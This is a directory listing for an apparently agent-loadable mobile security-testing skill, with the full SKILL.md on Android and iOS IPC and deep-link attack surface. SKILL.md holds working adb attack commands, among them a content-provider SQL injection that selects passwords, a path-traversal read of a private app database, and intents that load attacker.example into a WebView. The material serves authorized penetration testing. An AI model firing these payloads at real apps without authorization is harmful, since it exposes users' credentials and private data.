Agent skill

Testing Mobile Ipc

by trilwu in trilwu/secskills

Test mobile inter-process communication and deep link attack surface — exported Android activities, services, receivers and content providers, intent redirection, PendingIntent hijacking, App Links…

MITAuto-check passedMobile

Install Testing Mobile Ipc

skills CLI
$ npx skills add trilwu/secskills --skill testing-mobile-ipc -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install trilwu/secskills testing-mobile-ipc --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/secskills-offense/skills/testing-mobile-ipc .claude/skills/testing-mobile-ipc && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
testing-mobile-ipc
GitHub stars
157
Token cost
~2.2k tokens
SKILL.md length
790 words
Files
1
Skills in repo
50
Repo updated
First seen
Licence
MIT

At a glance

Test mobile inter-process communication and deep link attack surface — exported Android activities, services, receivers and content providers, intent redirection, PendingIntent hijacking, App Links…

  • Works in 5 steps: Reach a privileged action without… → Read data it should not — provider query… → Act as the victim app — intent… → …
  • Reviewing AndroidManifest.xml exported components
  • SKILL.md covers When to Use, When NOT to Use, Android: Enumerate the Surface and Android: Test Each Component…, plus 5 more sections
  • Calls adb, rg and curl

What it does

Testing Mobile Ipc is an agent skill from trilwu/secskills. Test mobile inter-process communication and deep link attack surface — exported Android activities, services, receivers and content providers, intent redirection, PendingIntent hijacking, App Links verification, iOS custom URL schemes, Universal Links, and App Groups — using drozer, adb, and Frida. Use when reviewing AndroidManifest.xml exported components, testing deeplinks or URL schemes, or assessing what another app on the device can reach.

Its SKILL.md is about 2.2k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Mobile, covering Mobile application security, Threat modeling and Mobile testing and debugging. It works with Android, iOS and Frida. The repository describes itself as: Transform Claude Code into your personal security engineer. The licence is MIT.

When your agent uses it

  • Reviewing AndroidManifest.xml exported components
  • Testing deeplinks
  • Assessing what another app on the device can reach

Example prompts

  • “/testing-mobile-ipc”

Workflow steps

5 steps, taken from the first numbered list in SKILL.md.

  1. Reach a privileged action without authentication — a transfer screen, a
  2. Read data it should not — provider query returning other users' rows, or
  3. Act as the victim app — intent redirection or PendingIntent hijack
  4. Render attacker content in a trusted context — WebView with a JS bridge
  5. Leak secrets to the caller — tokens returned in an activity result,

What it can do on your machine

Read from SKILL.md and the folder at commit ca53957. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • adb
    • rg
    • curl
    • jq
    • xcrun

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md. Its commands use curl, which can reach the network depending on how they are called.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Testing Mobile Ipc loads about 2.2k tokens when it runs. Until then it costs about 117 tokens; SKILL.md has 790 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~117
When it runs · the whole SKILL.md, loaded when a task matches
~2.2k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from trilwu/secskills at commit ca53957, republished under its MIT licence (© trilwu). 790 words, ~2,209 tokens.

Download SKILL.mdSave it as .claude/skills/testing-mobile-ipc/SKILL.md (or your agent's skills folder).
name
testing-mobile-ipc
description
Test mobile inter-process communication and deep link attack surface — exported Android activities, services, receivers and content providers, intent redirection, PendingIntent hijacking, App Links verification, iOS custom URL schemes, Universal Links, and App Groups — using drozer, adb, and Frida. Use when reviewing AndroidManifest.xml exported components, testing deeplinks or URL schemes, or assessing what another app on the device can reach.
verified
2026-07-27

Every exported component and registered URL scheme is a remote entry point that does not need the network. A malicious app on the same device — or a web page the user visits — can invoke them directly, and they are frequently written as if only the app itself would ever call them.

When to Use

  • Reviewing AndroidManifest.xml for exported components
  • Testing deep links, App Links, custom URL schemes, or Universal Links
  • Assessing content provider and broadcast receiver exposure
  • Checking PendingIntent, intent redirection, and App Group sharing
  • Answering "what can another app on this device do to this one?"

When NOT to Use

  • Network API testing — use testing-apis
  • Binary-level reversing — use analyzing-ios-binaries or the relevant reversing-* skill
  • TLS or detection problems blocking you — use bypassing-mobile-pinning or bypassing-root-jailbreak-detection first
  • The wider assessment — use testing-mobile-applications

Android: Enumerate the Surface

bash
apktool d target.apk -o out
# Every component with exported=true, or with an intent-filter and no explicit
# exported attribute on older targetSdk (which defaults to exported)
rg -n 'android:exported="true"|<intent-filter>' -B3 out/AndroidManifest.xml

# Live enumeration
adb shell dumpsys package com.target.app | rg -A3 'Activity Resolver|Receiver Resolver|Service Resolver|Provider'
drozer console connect
#   run app.package.attacksurface com.target.app
#   run app.activity.info -a com.target.app
#   run app.provider.info -a com.target.app

android:exported defaults changed — apps targeting API 31+ must declare it explicitly, but a component with an intent-filter on an older target is exported implicitly. Check targetSdkVersion before concluding a component is private.

Also check permission protection levels. A component "protected" by a custom permission declared with protectionLevel="normal" is protected by nothing: any app can request and receive it without user interaction.

bash
rg -n 'permission android:name|protectionLevel' out/AndroidManifest.xml

Android: Test Each Component Type

bash
# Activities — can an unauthenticated screen be launched directly?
adb shell am start -n com.target.app/.SomeActivity
adb shell am start -a android.intent.action.VIEW -d "myapp://path?param=value"
adb shell am start -n com.target.app/.WebActivity --es url "https://attacker.example"

# Services
adb shell am startservice -n com.target.app/.ExportedService --es cmd value

# Broadcast receivers
adb shell am broadcast -a com.target.app.ACTION_X --es data value

# Content providers — the highest-yield target
adb shell content query --uri content://com.target.app.provider/users
adb shell content query --uri content://com.target.app.provider/users \
  --where "1=1) UNION SELECT password FROM creds--"
adb shell content read --uri content://com.target.app.provider/files/../../databases/app.db

Content providers deserve specific attention because two classic bugs recur:

  • SQL injection through the selection/projection arguments, which are concatenated into the query far more often than in server code.
  • Path traversal in openFile(), where a provider that serves files from its own directory does not canonicalize the requested path, giving any app on the device read access to the app's private storage.

Android: The High-Impact Patterns

Intent redirection (the "confused deputy" of Android). An exported component takes an Intent as an extra and then starts it. The caller supplies the inner intent, so it executes with the victim app's identity — reaching its non-exported components and its permissions.

bash
rg -n 'getParcelableExtra.*Intent|startActivity\(.*getIntent\(\).*Extra' out/smali*
# Exploit shape: outer intent → exported component → inner intent → private component

PendingIntent hijacking. A PendingIntent created with an implicit base intent, or without FLAG_IMMUTABLE, lets the receiving app fill in the blanks and cause an action with the sender's identity.

bash
rg -n 'PendingIntent.get(Activity|Broadcast|Service)' -A3 out/smali*
# Findings: FLAG_MUTABLE (or no flag pre-API-31) plus an implicit base intent

Deep link to WebView. A deep link parameter that becomes a loadUrl() target turns any web page into a way to render attacker content inside the app's WebView — with its cookies, its JS bridges, and its file access.

bash
adb shell am start -a android.intent.action.VIEW -d "myapp://open?url=https://attacker.example"
rg -n 'loadUrl|addJavascriptInterface|setAllowFileAccess|setJavaScriptEnabled' out/smali*

App Links verification. autoVerify="true" only works if https://domain/.well-known/assetlinks.json is correct and reachable. When verification fails, the link degrades to a disambiguation dialog that another app can also claim.

bash
curl -s https://target.example/.well-known/assetlinks.json | jq .
adb shell pm get-app-links com.target.app

iOS

bash
# Declared URL schemes and associated domains
plutil -p Payload/TargetApp.app/Info.plist | rg -A5 'CFBundleURLSchemes'
codesign -d --entitlements :- Payload/TargetApp.app | rg -A3 'associated-domains|application-groups'

# Trigger a scheme
xcrun simctl openurl booted "myapp://path?param=value"
# On device: open the URL from Safari or Notes

Custom URL schemes are unauthenticated and claimable. Any app can register myapp://, and if two do, the winner is undefined. Anything reached through a custom scheme must be treated as attacker-invoked. Universal Links are the verified alternative:

bash
curl -s https://target.example/.well-known/apple-app-site-association | jq .
# Must be served over HTTPS, no redirect, correct app ID, correct paths

Also check:

  • App Groups — a shared container between the app and its extensions. Data written there is readable by every member, including a weakly-reviewed keyboard or share extension.
  • Keychain access groups — over-broad sharing across an app family.
  • Pasteboard — the general pasteboard is readable by any app; credentials and tokens copied there leak.
  • application:openURL:options: — check whether the handler validates the source application and the URL's parameters before acting.
Show full SKILL.md (276 more words)Show less

What Makes It a Finding

Invoking a component is not itself a finding. The finding is what it lets an unprivileged local app do:

  1. Reach a privileged action without authentication — a transfer screen, a settings change, an account action reachable by deep link past the login gate
  2. Read data it should not — provider query returning other users' rows, or traversal into private storage
  3. Act as the victim app — intent redirection or PendingIntent hijack
  4. Render attacker content in a trusted context — WebView with a JS bridge
  5. Leak secrets to the caller — tokens returned in an activity result, written to a shared container, or logged

Test whether the deep link path skips authentication specifically: launch the target component with the app logged out, and again with a different account.

Rationalizations to Reject

  • "It's exported but it needs a permission." Check the protection level. normal is granted automatically.
  • "Only our own app calls it." Anything exported is callable by any app, and by the browser if it has an intent-filter.
  • "The deep link needs a valid token in the URL." Test it. Tokens in deep links are frequently unvalidated, reusable, or leak through referrer headers.
  • "It's not exported." Confirm against targetSdkVersion, and check whether intent redirection reaches it anyway.
  • "iOS URL schemes are fine, we validate the input." Validate the caller too — schemes are unauthenticated and claimable by any app.
  • "The provider is read-only." Read is the finding when the rows belong to someone else.

References

  • testing-mobile-applications — the wider assessment
  • testing-apis — the backend those components ultimately call
  • analyzing-ios-binaries — entitlements and App Group enumeration
  • reporting-security-findings — severity for local-attacker findings
  • drozer, adb, apktool, jadx, objection, Frida

© trilwu, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in secskills-offense/skills/testing-mobile-ipc of trilwu/secskills.

Open the folder on GitHubat commit ca53957

Compare with similar skills

Testing Mobile Ipc next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Testing Mobile Ipc compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Testing Mobile Ipc this skilltrilwu/secskills157—~2.2kAutomated safety check: PassMIT
Re Mobile Packdslsdzc/rev-skills130—~2kAutomated safety check: PassApache-2.0
Mobile Securitytransilienceai/communitytools562—~2.5kAutomated safety check: PassMIT
Mobile App Security Testinglangbyyi/CyberStrikeAI-SRC135—~12kAutomated safety check: PassApache-2.0
Frida Mobile Securityindex-login/MobileRE-Skill144—~3kAutomated safety check: PassMIT
Mira Risk Collectvw2x/Mira105—~793Automated safety check: PassGPL-3.0

Similar skills

  • Re Mobile Pack

    dslsdzc/rev-skills

    Android 加固脱壳专项:乐固/360/梆梆/爱加密、DEX 恢复. An agent skill from dslsdzc/rev-skills.

    130 GitHub stars~2k tokensUpdated 4 days ago
    MobileAuto-check passed
  • Mobile Security

    transilienceai/communitytools

    Mobile application security testing (Android + iOS) mapped to OWASP MASVS/MASTG — static reversing (Flutter AOT, Unity IL2CPP, React Native/Hermes, native ARM64, Mach-O/Swift), SAST (manifest/IPC…

    562 GitHub stars~2.5k tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • Mobile App Security Testing

    langbyyi/CyberStrikeAI-SRC

    移动应用安全深度测试专业技能(v3.0):移动端深层攻击链(App→API→后端→云)、Android/iOS深度逆向与动态调试、Frida全面对抗与加固脱壳、iOS越狱检测绕过/ObjC Runtime/LLDB调试/证书固定绕过、跨平台框架漏洞(Flutter/React…

    135 GitHub stars~12k tokensUpdated 2 days ago
    SecurityAuto-check passed
  • Frida Mobile Security

    index-login/MobileRE-Skill

    用于 Android/iOS 移动应用安全逆向分析:Frida 动态插桩、绕过反调试/反注入/加固壳、脱壳、加密与 native SO 层 hook、运行时行为分析、jadx-mcp 静态攻击面分析、离线 SO 静态分析(ELF 侦察/字符串/交叉引用/反汇编/JNI 判型)。用户提到"绕过检测/闪退/脱壳/加密/抓包/行为摸底/内存扫描/分析 so/ELF…

    144 GitHub stars~3k tokensUpdated 9 days ago
    SecurityAuto-check passed
  • Run Mira environment risk collection. An agent skill from vw2x/Mira.

    105 GitHub stars~793 tokensUpdated 4 days ago
    SecurityAuto-check passed
  • R0crawl Skills

    manyuegong33/r0crawl_skills

    面向新手的全谱系逆向工程路由器,覆盖 Web/JavaScript、Android/iOS、Frida、脱壳、反分析、原生二进制、协议、固件、恶意软件、游戏、云 API、CTF、可复现一致性测试。用于逆向、起步、脱壳、反编译、hook、Frida、绕过检测、APK/SO/DEX/JS/PCAP/WASM/PE/ELF/Mach-O 分析、签名还原,或从样本到验证结果的完整调查。

    310 GitHub stars~1.2k tokensUpdated 19 days ago
    SecurityAuto-check passed

More from trilwu/secskills

All 50 skills in this repo
  • Audit source code for exploitable vulnerabilities using threat-model-driven review, taint tracing, invariant checking, and variant analysis.

    157 GitHub stars~3.2k tokensUpdated 1 mo ago
    Auto-check passed
  • Perform OSINT, subdomain enumeration, port scanning, web reconnaissance, email harvesting, and cloud asset discovery for initial access.

    157 GitHub stars~3.1k tokensUpdated 1 mo ago
    Auto-check: notes
  • Securing AI Systems

    trilwu/secskills

    Assess and harden LLM applications and agentic systems against prompt injection, tool misuse, excessive agency, memory poisoning, RAG data leakage, and model supply-chain risk, mapped to the OWASP…

    157 GitHub stars~2.9k tokensUpdated 1 mo ago
    Auto-check passed
  • Analyzing Binaries

    trilwu/secskills

    Reverse engineer compiled binaries, firmware, and mobile app packages using triage, static disassembly, decompilation, and dynamic instrumentation.

    157 GitHub stars~2.9k tokensUpdated 1 mo ago
    Auto-check passed
  • Analyzing Go Binaries

    trilwu/secskills

    Reverse engineer Go binaries by recovering function names and types from pclntab and moduledata using GoReSym, redress, and IDA/Ghidra Go plugins, and by reading Go's non-standard calling…

    157 GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed
  • Analyzing iOS Binaries

    trilwu/secskills

    Analyze iOS applications at the binary level — decrypting FairPlay-protected IPAs with frida-ios-dump or bagbak, inspecting Mach-O load commands, recovering Objective-C headers with class-dump, and…

    157 GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Works with

Categories

Questions about Testing Mobile Ipc

What does Testing Mobile Ipc do?

Test mobile inter-process communication and deep link attack surface — exported Android activities, services, receivers and content providers, intent redirection, PendingIntent hijacking, App Links…. Testing Mobile Ipc is an agent skill from trilwu/secskills. Test mobile inter-process communication and deep link attack surface — exported Android activities, services, receivers and content providers, intent redirection, PendingIntent hijacking, App Links verification, iOS custom URL schemes, Universal Links, and App Groups — using drozer, adb, and Frida.

When should I use Testing Mobile Ipc?

Testing Mobile Ipc fits situations like: reviewing AndroidManifest.xml exported components; testing deeplinks; assessing what another app on the device can reach.

How do I install Testing Mobile Ipc in Claude Code?

Run `npx skills add trilwu/secskills --skill testing-mobile-ipc -a claude-code`. Or copy the skill folder (secskills-offense/skills/testing-mobile-ipc in trilwu/secskills) into .claude/skills/testing-mobile-ipc in your project. Claude Code loads it when a task matches its description.

How do I install Testing Mobile Ipc in Codex?

Run `npx skills add trilwu/secskills --skill testing-mobile-ipc -a codex`. Or copy the skill folder (secskills-offense/skills/testing-mobile-ipc in trilwu/secskills) into .agents/skills/testing-mobile-ipc in your project. Codex loads it when a task matches its description.

Can I use Testing Mobile Ipc in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add trilwu/secskills --skill testing-mobile-ipc -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/testing-mobile-ipc, .gemini/skills/testing-mobile-ipc, .github/skills/testing-mobile-ipc and .opencode/skills/testing-mobile-ipc in your project.

What does Testing Mobile Ipc need to run?

Going by SKILL.md and its folder, Testing Mobile Ipc needs the command-line tools its instructions call (adb, rg, curl, jq and xcrun).

Does Testing Mobile Ipc access the network?

SKILL.md contains no URLs. Its commands use curl, which can reach the network depending on how they are called. This is read from the text; nothing was executed.

Is Testing Mobile Ipc safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Testing Mobile Ipc use?

Testing Mobile Ipc is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Testing Mobile Ipc use?

About 2.2k tokens (SKILL.md is roughly 8.8k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Testing Mobile Ipc?

Skills that share tags, products or a category with Testing Mobile Ipc: Re Mobile Pack (dslsdzc/rev-skills, 130 stars), Mobile Security (transilienceai/communitytools, 562 stars), Mobile App Security Testing (langbyyi/CyberStrikeAI-SRC, 135 stars) and Frida Mobile Security (index-login/MobileRE-Skill, 144 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Testing Mobile Ipc?

trilwu (a GitHub user) maintains it in trilwu/secskills, which has 157 GitHub stars. The repository holds 50 skills in this directory. The repository was last updated on September 4, 2026.

Source: trilwu/secskills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.